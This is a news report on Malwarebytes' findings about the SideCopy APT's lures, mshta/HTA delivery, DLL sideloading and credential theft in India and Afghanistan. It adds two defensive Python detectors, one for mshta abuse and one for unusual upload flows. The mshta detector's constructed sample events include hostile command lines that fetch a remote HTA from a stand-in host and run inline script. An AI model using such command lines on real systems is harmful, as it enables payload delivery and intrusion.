Report: SideCopy APT Used New Tactics in Recent Attacks
Pakistan-Linked Group's Attacks Show Increased Capability
The SideCopy APT group's attacks on military and government institutions in India and Afghanistan used new lures and payload delivery mechanisms, according to a report by researchers at threat intelligence firm Malwarebytes.
The researchers at Malwarebytes tell Information Security Media Group the primary objective of the Pakistan-linked threat group, which has been active since 2019, is to steal sensitive military and government information.
The researchers point out that improved, more capable payloads and lures, a dashboard that monitors the group's targets and malware packages in real time, and a new auto stealer that is loaded by DLL sideloading are indications that SideCopy is building up its capabilities for wider attacks in the future.
In India, SideCopy targeted the Indian Army, the National Cadet Corps of India and the National Council of Educational Research and Training, or NCERT, an autonomous institution under the government of India focused on improving school education in the country, the report says. None of the targets have publicly addressed the cyber incidents at their respective institutions or responded to ISMG's request for details.
In Afghanistan, the APT group targeted at least 14 government officials, especially those related to foreign affairs, the report says.
The attacks enabled the group to gain access to the two countries' government portals and steal banking information, password-protected documents, and Facebook, Twitter and Google account credentials of undisclosed government officials, according to the researchers.
In both the India and Afghanistan attacks, the researchers say, the SideCopy APT group infected victims' machines using one of its generic lures and gained access to a shared machine to collect the credentials.
Lures in India Attacks
The lure SideCopy used to target the Indian Army was an archive file containing a malicious shortcut, or LNK, file that, when opened, displayed a decoy PDF titled "Email facility address list of the ERE units: 20 Sept 2021," the report says.
SideCopy's strategy for targeting NCERT was similar. The decoy in that case was the curriculum of a course titled "Living the values, a value-narrative to grass-root leadership," the researchers say.
SideCopy, which has been linked to the Transparent Tribe APT group by Cisco Talos, the threat intelligence arm of Cisco, derives its name from its practice of copying the infection chain of the India-based SideWinder APT group, according to the researchers.
According to Cisco Talos' report, SideCopy's infrastructure setup indicates a special interest in Pakistani and Indian victims.
In November 2021, threat intelligence analysts at Facebook parent Meta removed the social media accounts of a group of hackers from Pakistan linked to SideCopy. The company says it then rolled out security measures for Afghan citizens, whom the group had targeted on the platform.
Thailand's Computer Emergency Response Team, or ThaiCERT, has also linked SideCopy to Pakistan. It says the group may also be connected to Transparent Tribe, also tracked as APT36, a well-known Pakistan-based APT group.
Details of Afghanistan Attacks
The group stole several Microsoft Office documents and databases belonging to the government of Afghanistan, the report says. This includes visas and diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan and the asset registration and verification authority database of the general director of administrative affairs of the government of Afghanistan.
The threat group carried out successful spear-phishing attacks on 10 undisclosed government members of the Administration Office of the President of Afghanistan, the report says. The group stole credentials of different government and bank services, as well as the officials' personal Google, Twitter and Facebook accounts, it says.
SideCopy also infected two members of Afghanistan's Ministry of Finance, but only succeeded in collecting their bank account details and personal information from Google and Facebook accounts, the researchers say.
The group also stole an Afghanistan National Procurement Authority official's credentials to Google, Twitter, Facebook, Instagram and Pinterest accounts, as well as their access to the government services account.
The researchers say that SideCopy primarily delivers archive files to its victims in spam or spear-phishing campaigns. Each archive contains either an embedded LNK file - a Windows shortcut, with the .lnk extension, that points to an executable and its arguments - or an MS Office document or Trojanized application, which is used to invoke mshta.exe, the Microsoft HTML Application host, to download and execute an HTML application, or HTA, file.
These HTA files perform "fileless" payload execution, running script in memory to deploy one of the remote access Trojans, or RATs, that the group has used in the past, including AllaKore and ActionRAT.
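The chain described above, an LNK file or Office document launching mshta.exe to pull an HTA, leaves a distinctive process-creation trail. The following detector is an added example, not code from Malwarebytes or from the group's tooling: it assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine, User), and every log line in it is constructed for the example. It flags mshta.exe when the command line fetches a remote URL, carries an inline javascript:/vbscript: handler, loads an HTA from a user-writable path, or is spawned by an Office application, while leaving the system-initiated mshta.exe invocation alone.

```python
"""Detect LNK/Office -> mshta.exe -> HTA execution in process-creation telemetry.

Added example (not Malwarebytes' or SideCopy's code).  Field names follow
Sysmon Event ID 1; the sample events below are constructed, not real captures.
"""
import re
from typing import Dict, List

# Constructed Sysmon-style ProcessCreate events, one per line, key="value" pairs.
SAMPLE_EVENTS = r"""
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe http://compromised.example/pkg/ere-units.hta" User="LAB\analyst"
ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe C:\Users\analyst\AppData\Local\Temp\curriculum.hta" User="LAB\analyst"
ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe javascript:a=new ActiveXObject('WScript.Shell');a.Run('calc.exe');close()" User="LAB\analyst"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe notes.txt" User="LAB\analyst"
ParentImage="C:\Windows\System32\svchost.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe C:\Windows\System32\ieframe.dll" User="NT AUTHORITY\SYSTEM"
"""

KV_RE = re.compile(r'(\w+)="([^"]*)"')
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# Directories an unprivileged user can write to; an HTA staged there is suspicious.
USER_WRITABLE_RE = re.compile(r"\\(?:Users|Temp|AppData|ProgramData|Downloads)\\", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" line into a dict."""
    return dict(KV_RE.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like HTA abuse (empty list = benign)."""
    if basename(event.get("Image", "")) != "mshta.exe":
        return []
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote HTA fetched over HTTP(S)")
    if SCRIPT_RE.search(cmd):
        reasons.append("inline script protocol handler in command line")
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("HTA loaded from a user-writable path")
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    return reasons


def detect(log_text: str) -> List[Dict[str, object]]:
    """Scan a block of events and return the suspicious ones with their reasons."""
    findings = []
    for line in log_text.strip().splitlines():
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append({
                "user": event.get("User"),
                "parent": basename(event.get("ParentImage", "")),
                "commandline": event.get("CommandLine"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["user"], finding["parent"], "->", finding["commandline"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The parent-process check deliberately treats explorer.exe as neutral: it is the parent of almost every program a user double-clicks, so a double-clicked LNK is caught by what mshta.exe is asked to run (a URL or a file in a user-writable directory), not by its parent.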
At the back end, the researchers found that each archive file SideCopy sends to its victims is a unique package with its own payloads, which are mostly hosted on compromised domains. SideCopy also has a system named Scout to individually monitor each package, they say.
The group has a dashboard that displays all the infected machines with individual package information, including the target's IP address, name of the package, the machine's operating system and version, user-agent, browser information, country and status of the victim.
According to the researchers, SideCopy uses two variants of the stealer, one communicating over HTTP and one over raw TCP, to perform the exfiltration.
Detection Evasion Mechanisms
The researchers tell ISMG that SideCopy uses three techniques to bypass security mechanisms.
The first is Dynamic Link Library, or DLL, sideloading. "In this method, the group uses legitimate applications to sideload the malicious payloads. This technique can bypass some of the security mechanisms," the researchers say.
SideCopy also enumerates the antivirus and other security products installed on the victim's machine. It then carries out additional steps to make sure its malware can bypass the products it finds, they say.
The third technique, according to the researchers, is the use of Microsoft HTML Applications run through mshta.exe, which the actor used to download and execute additional payloads.
Advice for Security Leaders
Because SideCopy relies on Microsoft HTML Applications, the MITRE ATT&CK framework advises organizations to use application control configured to block execution of mshta.exe wherever it is not required.
For Windows 10 and Windows Server 2016 and above, MITRE ATT&CK's guidance says Windows Defender Application Control policy rules can be applied to block mshta.exe and prevent its abuse.
To deal with spear-phishing, a common tactic of numerous APT groups including SideCopy, MITRE ATT&CK recommends that organizations deploy network intrusion prevention systems. Organizations can also use anti-spoofing and email authentication mechanisms such as SPF and DKIM to filter messages based on validity checks of the sender domain and the integrity of the message.
Once inside an organization's network, SideCopy uses legitimate external web services to exfiltrate data. MITRE ATT&CK says that analyzing network data for uncommon data flows and using behavior monitoring can help organizations detect abnormal patterns of activity and take corrective action.
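One concrete form of the "uncommon data flows" analysis recommended above is to baseline how much each workstation normally uploads to each external destination and then flag uploads that break that baseline. The script below is an added example, not code from MITRE or Malwarebytes: it assumes a simple space-separated proxy log format (date, source host, HTTP method, destination host, bytes sent), and both log extracts are constructed for the example. It flags three cases: a large upload to a destination never seen before, a large first upload from a host to a legitimate web service that only other hosts used, and an upload to a known destination that is several times the host's previous daily peak.

```python
"""Flag uncommon outbound data flows in web-proxy logs.

Added example (not MITRE's or Malwarebytes' code).  The log format and all
log lines are constructed; byte counts are bytes sent by the client.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed baseline week: <date> <src_host> <method> <dest_host> <bytes_sent>
BASELINE_LOG = """
2021-09-13 ws-finance-07 GET intranet.example.gov 812
2021-09-13 ws-finance-07 POST mail.example.gov 240311
2021-09-14 ws-finance-07 POST mail.example.gov 198204
2021-09-14 ws-finance-07 POST drive.cloud-example.com 3022114
2021-09-15 ws-finance-07 POST mail.example.gov 210998
2021-09-13 ws-mfa-02 POST mail.example.gov 120440
2021-09-14 ws-mfa-02 POST mail.example.gov 134012
2021-09-15 ws-mfa-02 GET intranet.example.gov 4001
"""

# Constructed day under review: one host starts pushing tens of megabytes out.
TODAY_LOG = """
2021-09-20 ws-finance-07 POST mail.example.gov 225610
2021-09-20 ws-finance-07 POST drive.cloud-example.com 2875001
2021-09-20 ws-mfa-02 POST mail.example.gov 129870
2021-09-20 ws-mfa-02 POST paste.share-example.net 41500220
2021-09-20 ws-mfa-02 POST drive.cloud-example.com 58230144
"""

Row = Tuple[str, str, str, str, int]
Finding = Tuple[str, str, int, str]


def parse(log: str) -> List[Row]:
    """Parse the constructed proxy format into (date, src, method, dst, bytes)."""
    rows = []
    for line in log.strip().splitlines():
        date, src, method, dst, sent = line.split()
        rows.append((date, src, method, dst, int(sent)))
    return rows


def daily_upload(rows: List[Row]) -> Dict[Tuple[str, str, str], int]:
    """Bytes sent per (src, dst, day), counting only methods that carry a body."""
    totals: Dict[Tuple[str, str, str], int] = defaultdict(int)
    for date, src, method, dst, sent in rows:
        if method in ("POST", "PUT"):
            totals[(src, dst, date)] += sent
    return totals


def build_baseline(rows: List[Row]) -> Dict[Tuple[str, str], int]:
    """Largest single-day upload seen per (src, dst) pair during the baseline."""
    peak: Dict[Tuple[str, str], int] = defaultdict(int)
    for (src, dst, _day), sent in daily_upload(rows).items():
        peak[(src, dst)] = max(peak[(src, dst)], sent)
    return peak


def find_uncommon_flows(baseline_rows: List[Row], today_rows: List[Row],
                        new_dst_min: int = 1_000_000, ratio: float = 5.0) -> List[Finding]:
    """Return (src, dst, bytes, reason) for flows that break the baseline."""
    peak = build_baseline(baseline_rows)
    known_dsts = {dst for (_src, dst) in peak}
    findings: List[Finding] = []
    for (src, dst, _day), sent in sorted(daily_upload(today_rows).items()):
        if (src, dst) in peak:
            # Known pair: only a jump well above its own historical peak is notable.
            if sent >= ratio * peak[(src, dst)]:
                findings.append((src, dst, sent, f"{sent / peak[(src, dst)]:.1f}x baseline peak"))
        elif dst in known_dsts:
            # Legitimate service in the estate, but this host never uploaded to it before.
            if sent >= new_dst_min:
                findings.append((src, dst, sent,
                                 "first upload from this host to a destination other hosts use"))
        elif sent >= new_dst_min:
            findings.append((src, dst, sent, "upload to a destination never seen in baseline"))
    return findings


if __name__ == "__main__":
    for src, dst, sent, reason in find_uncommon_flows(parse(BASELINE_LOG), parse(TODAY_LOG)):
        print(f"{src} -> {dst}: {sent:,} bytes ({reason})")
```

The thresholds are assumptions to tune per environment: new_dst_min stops every small form submission to a new site from alerting, and the ratio is applied to the host's own peak rather than a fleet-wide average so that a finance workstation that routinely uploads to a cloud drive does not mask a foreign-affairs workstation that never did.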